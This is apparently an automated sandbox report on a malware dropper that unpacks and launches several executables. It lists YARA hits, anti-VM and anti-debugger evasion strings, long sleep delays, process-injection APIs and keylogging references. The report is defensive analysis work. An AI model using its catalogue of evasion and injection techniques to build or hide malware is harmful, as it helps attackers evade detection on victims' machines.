                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara match File source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR
                    Source: Yara match File source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED
                    Source: Yara match File source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, test.exe, test.exe, 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe TID: 7116 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe TID: 5312 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe TID: 3440 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\gay.exe TID: 5732 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Opus.exe TID: 3456 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Opus.exe TID: 6076 Thread sleep time: -40000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\aaa.exe TID: 5664 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Opus.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\gay.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Opus.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\aaa.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe API coverage: 9.9 %
                    Source: C:\Users\user\AppData\Roaming\22.exe Dropped PE file which has not been started: C:\Windows\Cursors\WUDFhosts.exe
                    Source: C:\Users\user\AppData\Roaming\22.exe Dropped PE file which has not been started: C:\Windows\Help\Winlogon.exe
                    Source: C:\Users\user\AppData\Roaming\22.exe Dropped PE file which has not been started: C:\Windows\Help\active_desktop_render.dll
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe API call chain: ExitProcess graph end node
                    Source: test.exe, 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: vmware
                    Source: 4.exe, 00000010.00000002.549082146.0000000005A31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
                    Source: test.exe, 00000006.00000002.703368085.0000000001410000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                    Source: healastounding.exe Binary or memory string: \VMWare\
                    Source: 8f1c8b40c7be588389a8d382040b23bb.exe, 0000000E.00000000.431135181.00000000004BD000.00000020.00000001.01000000.0000000D.sdmp Binary or memory string: \VMWare\F\oracle\virtualbox guest additions\
                    Source: 4.exe, 00000010.00000002.549082146.0000000005A31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Opus.exe, 00000009.00000002.702218807.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.496866786.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.497883150.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.628943964.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.641573561.0000000001374000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.499366565.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.536070108.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.518432103.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.645223386.0000000001374000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.501699554.0000000001375000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: aaa.exe, 0000000C.00000002.458844469.0000000002915000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware svga ii3vm additions s3 trio32/64
                    Source: C:\Users\user\AppData\Roaming\Opus.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Roaming\test.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe Code function: 7_2_00416480 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe Code function: 7_2_0040EE60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\AppData\Roaming\Opus.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\aaa.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe Code function: 7_2_00404770 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe Code function: 7_2_0041A780 _memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\aaa.exe; Memory written: C:\Users\user\AppData\Roaming\aaa.exe base: 3E0000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe; Section unmapped: unknown base address: 400000
                    Source: Pluto Panel.exe.0.dr, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: Pluto Panel.exe.0.dr, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: gay.exe.4.dr, OK.cs; Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                    Source: gay.exe.4.dr, kl.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32'), ('MapVirtualKey', 'MapVirtualKey@user32.dll')
                    Source: Opus.exe.4.dr, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs; Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe; Process created: C:\Users\user\AppData\Roaming\healastounding.exe "C:\Users\user\AppData\Roaming\healastounding.exe"
